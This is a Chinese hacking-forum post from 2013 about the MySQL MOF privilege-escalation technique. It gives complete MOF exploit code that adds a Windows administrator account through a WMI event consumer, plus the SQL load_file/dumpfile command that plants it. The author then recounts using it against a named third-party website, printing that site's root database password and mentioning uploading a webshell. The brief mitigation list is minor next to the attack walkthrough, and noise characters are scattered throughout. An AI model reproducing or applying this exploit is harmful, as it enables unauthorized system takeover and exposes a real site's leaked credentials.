中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]
作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
% W+ z7 e- f9 h0 r0 @+ l6 [2 {: @7 F! K/ _( [9 x! N' S
网上公开的一些利用代码:
$ H8 d6 ^7 b3 y+ W: @5 n2 n6 F5 Q- p9 y, D* z* J. {
#pragma namespace(“\\\\.\\root\\subscription”)
* t3 X$ o6 K/ o+ m6 O: `7 B4 N+ k
- U+ C! d: R6 r/ T6 ~- hinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };/ V1 F; [& W$ W, g0 m7 z

; F. C$ X  v0 j 7 q7 ?: [+ G0 d, ]% {# |
5 s- A3 q! b4 H2 c' o6 s. @

9 S$ R* L- X: O) E( N4 ]- a) [3 X  ?8 i7 A
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
5 x/ q6 @2 }0 C) k% K* j从上面代码来看得出解决办法:: F4 G* T# t; F! j. K8 Z

" z* H' [: d4 }* l- x1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数3 s9 `4 d$ z$ Y% W, S9 }
* r9 y2 Q" `, e8 U. C
2、禁止使用”WScript.Shel”组件
( {! T0 Q- m4 V+ N# I' e( \6 v5 V% t+ ^: P  V( m6 W  p( [' D
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
( N' O" w. a4 u! s. r  ?# Z+ n7 [" l9 x) @: W; |2 G  Y  W0 O
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下  S  x  g4 K, j0 f! R

2 b+ Q1 W" ]0 ?( K# p事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权3 B: w/ g0 m3 O6 L, y( v) U

2 p6 D- d) U( U4 C但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
( C; _* _3 |" ~4 a* `) m1 p0 \9 q9 U! z
看懂了后就开始练手吧& j* G; g% Q1 ?8 I2 s3 w
) L7 `1 e& T/ t9 N, w8 [
http://www.webbmw.com/config/config_ucenter.php 一句话 a* B1 z2 [" ~* v2 O  _

4 s2 t( A5 v$ ]- w6 T$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
  I. B. Z9 J& V/ G5 a% `% X9 {: E  _$ c+ A
于是直接用菜刀开搞% n8 H* K5 h2 B( D

7 v5 ]! w" s/ C5 i" z上马先
4 D! R4 l% ]& i- {6 s: ^$ t7 i0 m# z0 K2 o4 h6 p
既然有了那些账号 之类的 于是我们就执行吧…….
( s2 }7 |% p/ k/ Q3 T+ b$ i! W  p- Z- K% u- s) w
小小的说下) d' @, o5 [# h4 M2 u; w
* |, T1 s' d2 [7 `5 d+ r, y8 _& I$ d& [
在这里第1次执行未成功        原因未知1 y; r1 E, q# t; f1 J3 W" x
% u( c$ c) h" K* @1 w8 a
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
: s- F: R1 s# n4 |
  ^' E6 I9 [8 H* A  C/ r#pragma namespace(“\\\\.\\root\\subscription”); d# W2 w- o/ \' z

, B3 `6 t+ Q1 k& Einstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
" x% t3 G" u7 X
8 R* `0 r- J- X+ N+ T# H我是将文件放到C:\WINDOWS\temp\1.mof
) [* I9 c2 U0 X; P
' b5 r! ?+ Y& w6 p" g- E" H所以我们就改下执行的代码
" C& f& f5 a& j; i" i& M, y8 a8 c  l# b) \+ \8 ]
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
( a/ [6 B! b1 O0 g6 V: o' j$ u9 V* z+ c9 f7 \

, L: ?- c# X7 N2 h; x. ?
2 w& B$ g" o  ]% D但是 你会发现账号还是没有躺在那里。。
5 Z, c- P5 Q4 k' _- [- @. e8 i& d& o9 Q# E2 U( l7 R
于是我就感觉蛋疼
+ q* O) }: c) a5 _, H( \; Z
' N/ b9 p) @% b4 P; Y- F就去一个一个去执行 但是执行到第2个 mysql时就成功了………( [5 q$ L" A4 k! Q+ H% I/ H% k7 e2 ~& ]

* \5 N9 \& i4 t" S) ~( r6 X% f6 Z; r; g, \1 M2 T& S* W
! |0 G7 s9 Z8 P. E7 ~
但是其他库均不成功…
9 X8 F3 o6 N3 r  k9 j" S. a  p) d( l+ K7 j
我就很费解呀 到底为什么不成功求大牛解答…7 h, p0 x) w6 m  \) y
- f, V# [- d6 c8 v! w0 H; ]3 F

- f' c3 S. K# h) ]9 g- ?1 I) G$ w. }5 ?% Z3 {# V




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2